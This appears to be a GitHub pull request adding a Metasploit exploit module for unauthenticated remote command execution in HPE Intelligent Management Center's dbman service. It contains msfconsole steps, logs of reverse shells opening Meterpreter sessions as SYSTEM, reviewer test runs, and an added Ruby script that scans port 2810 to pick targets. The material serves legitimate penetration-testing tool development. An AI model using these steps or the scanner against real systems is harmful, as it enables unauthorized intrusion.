Add HPE iMC dbman RestartDB Unauthenticated RCE exploit #9376

Merged
merged 2 commits into from Jan 9, 2018

Conversation

@bcoles
Contributor

bcoles commented Jan 5, 2018

Add HPE iMC dbman RestartDB Unauthenticated RCE exploit

    This module exploits a remote command execution vulnerability in
    Hewlett Packard Enterprise Intelligent Management Center before
    version 7.3 E0504P04.

    The dbman service allows unauthenticated remote users to restart
    a user-specified database instance (OpCode 10008), however the
    instance ID is not sanitized, allowing execution of arbitrary
    operating system commands as SYSTEM. This service listens on
    TCP port 2810 by default.

    This module has been tested successfully on iMC PLAT v7.2 (E0403)
    on Windows 7 SP1 (EN).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce
  • set RHOST <IP>
  • run
  • Verify you get a session

Example Output

msf > use exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce 
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > check
[*] 172.16.191.166:2810 The target service is running, but could not be validated.
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > set verbose true
verbose => true
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] 172.16.191.166:2810 - Powershell command length: 6091
[*] 172.16.191.166:2810 - Sending payload (6091 bytes)...
[*] Sending stage (179779 bytes) to 172.16.191.166
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:55316) at 2018-01-05 03:23:55 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-SGBSD5TQUTQ
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
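As an added example that is not part of this PR or of the Metasploit module, the following Ruby script performs the same kind of reachability check that the `check` output above reflects: a listener on the dbman port (TCP 2810 by default, per the PR description) is reported as detected but not validated, because a bare TCP connect proves nothing about the iMC version or the OpCode 10008 instance-ID handling. The hosts, the timeout values and every message string other than the "running, but could not be validated" line are this example's own assumptions.

```ruby
# Added example: a stand-alone reachability probe for the HPE iMC dbman
# listener. This is NOT the Metasploit module's code; it only illustrates
# why the module's `check` can report "running, but could not be validated":
# a successful TCP connect proves a listener exists on the port, nothing more.
require 'socket'

DEFAULT_DBMAN_PORT = 2810 # default dbman port given in the PR description

# Probe one host:port with a bounded connect timeout.
# Returns :detected (listener accepted the connection), :safe (connection
# refused) or :unknown (timeout/unreachable; no conclusion can be drawn).
def dbman_check(host, port = DEFAULT_DBMAN_PORT, timeout = 3)
  sock = Socket.tcp(host, port, connect_timeout: timeout)
  sock.close
  :detected
rescue Errno::ECONNREFUSED
  :safe
rescue SystemCallError, SocketError
  # ETIMEDOUT, EHOSTUNREACH, ENETUNREACH, DNS failure, ... (assumption:
  # anything other than an explicit refusal is treated as inconclusive)
  :unknown
end

# One human-readable line per result. The :detected wording mirrors the
# module output quoted in this PR; the other two strings are this example's own.
def check_message(host, port, result)
  prefix = "#{host}:#{port}"
  case result
  when :detected then "#{prefix} The target service is running, but could not be validated."
  when :safe     then "#{prefix} No dbman listener on this port."
  else                "#{prefix} Cannot reliably check (timeout or host unreachable)."
  end
end

# Probe several hosts and return a Hash of host => result, so the caller can
# decide which targets are worth running the exploit module against.
def scan_hosts(hosts, port = DEFAULT_DBMAN_PORT, timeout = 3)
  hosts.each_with_object({}) { |h, acc| acc[h] = dbman_check(h, port, timeout) }
end

# Usage (hypothetical file name): ruby dbman_check.rb 172.16.191.166 [more hosts...]
if __FILE__ == $0 && !ARGV.empty?
  scan_hosts(ARGV).each { |host, res| puts check_message(host, DEFAULT_DBMAN_PORT, res) }
end
```

A refused connection is the only outcome that clears a host; a timeout is reported as unknown rather than safe, since a firewall dropping packets to 2810 says nothing about whether the service is running behind it.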
@bcoles bcoles added module docs labels Jan 5, 2018
@wchen-r7 wchen-r7 self-assigned this Jan 8, 2018
@wchen-r7

Contributor

wchen-r7 commented Jan 8, 2018

Hi @bcoles, it looks like HP is no longer hosting the vulnerable version of the software:

msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.146:2810 - Sending payload (6135 bytes)...
[*] Exploit completed, but no session was created.
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > check
[*] 172.16.249.146:2810 The target service is running, but could not be validated.
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > 

I actually got version 7.3 (E0506).

I will need to look around and see if I have one that's vulnerable.

@bcoles

Contributor Author

bcoles commented Jan 8, 2018

@wchen-r7 the link in the module documentation should allow you to download 7.2 E0403.

@wchen-r7

Contributor

wchen-r7 commented Jan 8, 2018

I am dumb. I should have read it more carefully. Thank you!

@bcoles

Contributor Author

bcoles commented Jan 8, 2018

@wchen-r7 It's worth noting that you may have to run the module a couple of times. I get a fail rate of about 1 in 10.

It's usually fairly reliable and doesn't crash the service, so I used ExcellentRanking.

I thought the occasional failures were due to bad characters, but the payload is encoded and the exact same payload will fail one time but work another.

Similarly, while the exploit uses randomized junk strings of randomized length, these do not appear to be the cause of failure. Running the module with static strings of static length will still result in occasional failure.

The generated packets are well formed. During development, I noticed that malformed packets, including packets of an incorrect length, will cause the server to reject the connection. The exploit is stable, and the server never rejects the connection, indicating the packets are in fact well formed.

The exploit is fast and easy to re-execute. As such, I consider a 10% failure rate acceptable. I'm inclined to think the issue is due to the dbman service.

The same is true for the other iMC exploit #9377

@wchen-r7

Contributor

wchen-r7 commented Jan 9, 2018

@bcoles Good to know. Thanks!

@wchen-r7

Contributor

wchen-r7 commented Jan 9, 2018

@bcoles I tested the exploit 11 times in a row, and it never failed on me. Here's the log:

msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6103 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.148:50072) at 2018-01-09 13:13:22 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6103 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 2 opened (172.16.249.1:4444 -> 172.16.249.148:50078) at 2018-01-09 13:13:53 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6111 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 3 opened (172.16.249.1:4444 -> 172.16.249.148:50081) at 2018-01-09 13:13:56 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6079 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 4 opened (172.16.249.1:4444 -> 172.16.249.148:50082) at 2018-01-09 13:13:59 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6091 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 5 opened (172.16.249.1:4444 -> 172.16.249.148:50083) at 2018-01-09 13:14:02 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6111 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 6 opened (172.16.249.1:4444 -> 172.16.249.148:50085) at 2018-01-09 13:14:05 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 6 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6123 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 7 opened (172.16.249.1:4444 -> 172.16.249.148:50087) at 2018-01-09 13:14:08 -0600

meterpreter > exit

[*] 172.16.249.148 - Meterpreter session 7 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6123 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 8 opened (172.16.249.1:4444 -> 172.16.249.148:50088) at 2018-01-09 13:14:11 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 8 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6091 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 9 opened (172.16.249.1:4444 -> 172.16.249.148:50089) at 2018-01-09 13:14:13 -0600

meterpreter > exit

[*] 172.16.249.148 - Meterpreter session 9 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6103 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 10 opened (172.16.249.1:4444 -> 172.16.249.148:50091) at 2018-01-09 13:14:16 -0600

meterpreter > exit

[*] 172.16.249.148 - Meterpreter session 10 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6091 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 11 opened (172.16.249.1:4444 -> 172.16.249.148:50093) at 2018-01-09 13:14:19 -0600

meterpreter > exit

[*] 172.16.249.148 - Meterpreter session 11 closed.  Reason: User exit
@wchen-r7 wchen-r7 merged commit 9ec17bd into rapid7:master Jan 9, 2018
2 checks passed
Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
continuous-integration/travis-ci/pr The Travis CI build passed
wchen-r7 added a commit that referenced this pull request Jan 9, 2018
Land #9376
@wchen-r7

Contributor

wchen-r7 commented Jan 9, 2018

Release Notes

This module exploits a remote command execution vulnerability in HP Enterprise Intelligent Management Center before version 7.3. The dbman service allows unauthenticated remote users to restart a user-specified database instance (OpCode 10008), however the instance ID is not sanitized, allowing execution of arbitrary operating system commands as SYSTEM.

@bcoles bcoles deleted the bcoles:hp_imc_dbman_restartdb_unauth_rce branch Jan 10, 2018
@tdoan-r7 tdoan-r7 added the rn-exploit label Jan 25, 2018
3 participants